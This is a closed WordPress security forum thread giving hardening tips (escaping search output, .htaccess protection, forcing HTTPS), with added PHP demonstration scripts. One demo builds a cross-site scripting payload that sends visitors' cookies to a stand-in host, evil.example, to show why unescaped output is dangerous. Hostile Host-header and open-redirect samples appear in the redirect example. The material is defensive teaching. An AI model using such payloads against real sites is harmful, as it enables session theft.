[sticky] [closed] Security for WordPress Installations (6 posts)

  1. milo (moderator), posted 4 years ago

    DO NOT use the default Kubrick theme, as it contains a security bug:
    Affected Script: /themes.php?page=functions.php
    “Header Image and Color” section of the Default Theme Kubrick.
    Further info: here.

  2. milo (moderator), posted 4 years ago

    DO NOT use this search code in the search PHP file:
    <?php echo $_SERVER['PHP_SELF']; ?>
    Nobody should be allowed to search your entire server, should they?
    Use this one instead:
    <?php bloginfo('home'); ?>/

  3. milo (moderator), posted 4 years ago

    Another piece of bad code used in title tags or search templates:
    <?php echo $s; ?>
    as it allows malicious code injection.
    Use this one:
    <?php echo wp_specialchars($s, 1); ?>
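The two posts above describe the same class of bug, reflected cross-site scripting, from two sides: the form action built from `$_SERVER['PHP_SELF']` (which carries attacker-controlled path info) and the raw search term `$s` echoed into an attribute. The script below is an added example, not code from the original thread or from WordPress. It runs from the PHP CLI on constructed request data and needs no WordPress install; `htmlspecialchars()` with `ENT_QUOTES` stands in for `wp_specialchars($s, 1)` (in current WordPress the equivalent is `esc_attr()`), and `https://example.com` stands in for the value `bloginfo('home')` would print.

```php
<?php
// Added example, not part of the original forum posts. Demonstrates the
// reflected-XSS hole in echoing $_SERVER['PHP_SELF'] and an unescaped
// search term, next to the escaped/fixed-action form. Request data is
// constructed here so the script runs stand-alone from the CLI.

// Constructed attacker request: path info appended to the script name (this
// is what ends up in PHP_SELF when AcceptPathInfo is on), plus a hostile
// ?s= search parameter.
$request = [
    'PHP_SELF' => '/index.php/"><script>alert(1)</script><a href="',
    's'        => '"><script>document.location="http://evil.example/?c="+document.cookie</script>',
];

// Site home URL; assumed value standing in for bloginfo('home').
const SITE_HOME = 'https://example.com';

function vulnerable_form(array $req): string
{
    // Same markup as:
    //   <form action="<?php echo $_SERVER['PHP_SELF']; ?>">
    //     <input name="s" value="<?php echo $s; ?>">
    return '<form action="' . $req['PHP_SELF'] . '">'
         . '<input name="s" value="' . $req['s'] . '"></form>';
}

function hardened_form(array $req, string $home): string
{
    // Post to the fixed site URL instead of the attacker-influenced PHP_SELF,
    // and HTML-encode the search term as wp_specialchars($s, 1) does
    // (ENT_QUOTES so both ' and " are encoded, since the value sits in an attribute).
    $action = htmlspecialchars($home, ENT_QUOTES, 'UTF-8') . '/';
    $s      = htmlspecialchars($req['s'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $action . '">'
         . '<input name="s" value="' . $s . '"></form>';
}

function breaks_out_of_attribute(string $html): bool
{
    // Crude check: does a <script> tag appear anywhere in the rendered markup?
    return stripos($html, '<script') !== false;
}

echo "vulnerable: ", vulnerable_form($request), "\n";
echo "hardened:   ", hardened_form($request, SITE_HOME), "\n";
echo "vulnerable injects script: ",
     breaks_out_of_attribute(vulnerable_form($request)) ? 'yes' : 'no', "\n";
echo "hardened injects script:   ",
     breaks_out_of_attribute(hardened_form($request, SITE_HOME)) ? 'yes' : 'no', "\n";
```

Run it with `php xss_demo.php`. The hardened output keeps the attacker's payload as inert text (`&quot;&gt;&lt;script&gt;...`), while the vulnerable output closes the attribute and the tag and hands the browser a live script element.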

  4. milo (moderator), posted 3 years ago

    Strongly recommended:

    Additional tips:
    Tip 1 :

    Remove the WordPress 'version string' from your theme files.
    Go to the WordPress dashboard, click on Presentation -> Edit Themes -> header.php.
    Find and remove this: bloginfo('version'). Save the file.

    Tip 2 :

    Place an empty 'index.html' file in the plugins folder.
    Open Notepad. Click 'Save as' and save the file as index.html (be sure to change the file type from "Text files" to "All files").
    Upload the file to the WordPress plugins folder on your web server.

    Tip 3:

    Upload a copy of the .htaccess file into the wp-admin folder.
    Using an FTP program or your web server's file manager, go to the root folder of your server and download the .htaccess file (set 'show hidden files' first if you are using an FTP program such as FileZilla).
    Go to your wp-admin folder.
    Upload the .htaccess file you have just downloaded.

    Tip 4:

    You can also disallow users pretending to be search engines, and search engines themselves, from crawling the core WordPress folders by putting these lines in your robots.txt file (upload the file to the root of your WordPress installation folder when you have finished).

    # This rule means it applies to all user-agents
    User-agent: *

    # Disallow all directories and files within
    Disallow: /wp-admin/
    Disallow: /wp-includes/

    Tip 5:

    Password-protect the wp-admin directory:
    Create a file within your wp-admin directory named ".htaccess" if there isn't already one.
    Create a file ABOVE YOUR PUBLIC_HTML directory named ".htpasswd". Make sure you put this outside the web-accessible directory or someone could read your password! Usually this is where you land when you first log in with your FTP program.
    Append the following contents to the ".htpasswd" file, where xxxx = your username and yyyy = your password:
    xxxx:yyyy

    Tip 6:

    Append the following to your ".htaccess" file inside your wp-admin directory. Make sure you use the absolute path to the ".htpasswd" file. If you don't know it, ask your ISP. xxxx = the username that you entered in your ".htpasswd" file:
    AuthUserFile /home/username/.htpasswd
    AuthGroupFile /dev/null
    AuthName EnterPassword
    AuthType Basic

    Require user xxxx

    Tip 7:

    Restrict access to the wp-content and wp-includes directories:
    Create a file within your wp-content and wp-includes directories named ".htaccess" if there isn't already one.
    Append the following to the ".htaccess" file. NOTE: you may have trouble with some plugins with this method:
    # deny everything by default ...
    Order Allow,Deny
    Deny from all
    # ... except static assets; the dot is escaped so only real extensions match
    <Files ~ "\.(css|jpe?g|png|gif|js)$">
    Allow from all
    </Files>

    Important Note: Please ensure that your WordPress files and database are backed up before attempting any of these changes.
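One caveat on Tips 5 and 6 that a practitioner will want: on Unix, Apache's mod_authn_file does not accept plaintext `user:password` entries in `.htpasswd`; it expects a password hash of the kind the `htpasswd` tool writes (`htpasswd -B -c /home/username/.htpasswd xxxx` creates the file with a bcrypt hash; bcrypt is accepted from httpd 2.4.4 on). The script below is an added example, not code from the original post, that generates such an entry with PHP's `password_hash()` and checks a login against it the way Apache would. The username and password are constructed sample values.

```php
<?php
// Added example, not part of the original forum post. Builds an .htpasswd
// line with a bcrypt ($2y$) hash, which Apache httpd 2.4.4+ verifies, and
// checks a candidate password against it. Sample credentials are constructed.

function htpasswd_line(string $user, string $password): string
{
    // Apache splits each line on the first colon, so a colon (or a line
    // break) in the username would corrupt the file; refuse it outright.
    if ($user === '' || strpbrk($user, ":\r\n") !== false) {
        throw new InvalidArgumentException('username must be non-empty and contain no ":" or line breaks');
    }
    if ($password === '') {
        throw new InvalidArgumentException('empty password refused');
    }
    // Cost 12 keeps verification slow enough to blunt offline guessing if the
    // file ever leaks, but fast enough for an interactive login.
    $hash = password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
    return $user . ':' . $hash;
}

function htpasswd_check(string $line, string $user, string $password): bool
{
    // Mirrors what Apache does at login time: match the username, then verify
    // the supplied password against the stored hash. hash_equals() avoids a
    // timing side channel on the username comparison.
    $line = rtrim($line, "\r\n");
    if (strpos($line, ':') === false) {
        return false;
    }
    [$u, $hash] = explode(':', $line, 2);
    return hash_equals($u, $user) && password_verify($password, $hash);
}

function append_htpasswd(string $path, string $line): void
{
    // Write outside the document root (see Tip 5) with an exclusive lock so
    // concurrent writers cannot interleave lines, and keep the file unreadable
    // to other local users.
    file_put_contents($path, $line . "\n", FILE_APPEND | LOCK_EX);
    chmod($path, 0640);
}

// Constructed sample credentials.
$line = htpasswd_line('wpadmin', 'correct horse battery staple');
echo $line, "\n";
echo "correct password accepted: ", htpasswd_check($line, 'wpadmin', 'correct horse battery staple') ? 'yes' : 'no', "\n";
echo "wrong password accepted:   ", htpasswd_check($line, 'wpadmin', 'guess') ? 'yes' : 'no', "\n";
echo "wrong user accepted:       ", htpasswd_check($line, 'admin', 'correct horse battery staple') ? 'yes' : 'no', "\n";

// To install the entry (path assumed, as in Tip 6):
// append_htpasswd('/home/username/.htpasswd', $line);
```

The file the script appends to is the one `AuthUserFile` in Tip 6 points at. Because bcrypt hashes are salted, generating the same line twice yields different text; both verify.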

  5. milo (moderator), posted 3 years ago

    Force SSL (https://) on an entire website, without putting force-SSL PHP code on every page, through the .htaccess file:

    RewriteEngine On
    RewriteCond %{SERVER_PORT} 80
    RewriteRule ^(.*)$ https://domain.com/$1 [R,L]

    Change "domain.com" to your domain; this way your entire website
    is safe and secure, which is good for shops etc.

  6. milo (moderator), posted 3 years ago

    Force A Secure Page Using PHP

    // force redirect to secure page
    if ($_SERVER['SERVER_PORT'] != '443') {
        header('Location: https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
        exit();
    }

    The code forces the script to run on the secure port 443 rather than on port 80.
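Two things bite with the snippet above in practice: behind a TLS-terminating proxy or load balancer PHP sees port 80 even for HTTPS requests, so the check loops, and `$_SERVER['HTTP_HOST']` comes from the client's Host header, so a crafted request can turn the redirect into a redirect to a host the attacker chooses. The script below is an added example, not code from the original post, showing a variant that decides on the `HTTPS` flag (and, only where the proxy is known to set it, `X-Forwarded-Proto`) and builds the Location from a fixed canonical hostname. `CANONICAL_HOST` and the sample requests are constructed values.

```php
<?php
// Added example, not part of the original forum post. Hardened form of the
// "force HTTPS" redirect: works behind a TLS-terminating proxy and never
// builds the Location header from the attacker-controlled Host header.

// Assumed canonical hostname; set this to the site's real name.
const CANONICAL_HOST = 'www.example.com';

// Assumption: set to true only if a trusted proxy in front of this server
// always overwrites X-Forwarded-Proto. Otherwise a client can spoof it and
// skip the redirect.
const TRUST_FORWARDED_PROTO = false;

function is_https(array $server): bool
{
    // Direct TLS: PHP sets HTTPS to a non-empty value other than "off".
    if (!empty($server['HTTPS']) && strtolower((string) $server['HTTPS']) !== 'off') {
        return true;
    }
    if (TRUST_FORWARDED_PROTO
        && isset($server['HTTP_X_FORWARDED_PROTO'])
        && strtolower((string) $server['HTTP_X_FORWARDED_PROTO']) === 'https') {
        return true;
    }
    // Fall back to the original post's port test.
    return (string) ($server['SERVER_PORT'] ?? '') === '443';
}

function secure_location(array $server): ?string
{
    if (is_https($server)) {
        return null; // already secure, no redirect needed
    }
    $uri = (string) ($server['REQUEST_URI'] ?? '/');
    // Accept only an absolute path. A protocol-relative "//evil.example/..."
    // would otherwise turn this into an open redirect.
    if ($uri === '' || $uri[0] !== '/' || substr($uri, 0, 2) === '//') {
        $uri = '/';
    }
    return 'https://' . CANONICAL_HOST . $uri;
}

// Constructed sample requests.
$samples = [
    'plain http, hostile Host header' => [
        'SERVER_PORT' => '80', 'HTTP_HOST' => 'evil.example', 'REQUEST_URI' => '/cart?id=7',
    ],
    'direct TLS' => [
        'SERVER_PORT' => '443', 'HTTPS' => 'on', 'HTTP_HOST' => CANONICAL_HOST, 'REQUEST_URI' => '/cart',
    ],
    'http with spoofed X-Forwarded-Proto' => [
        'SERVER_PORT' => '80', 'HTTP_X_FORWARDED_PROTO' => 'https', 'REQUEST_URI' => '//evil.example/',
    ],
];

foreach ($samples as $label => $req) {
    $loc = secure_location($req);
    echo str_pad($label, 36), ': ', $loc === null ? 'already HTTPS' : "redirect to $loc", "\n";
}

// In a real page the whole check is:
// if (($loc = secure_location($_SERVER)) !== null) { header('Location: ' . $loc, true, 301); exit; }
```

Use a 301 (permanent) rather than the default 302 so browsers and caches remember the upgrade, and once every path is confirmed to work over HTTPS, add a `Strict-Transport-Security` header on the secure responses so the browser stops issuing the plain-HTTP request in the first place.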

Topic Closed

This topic has been closed to new replies.
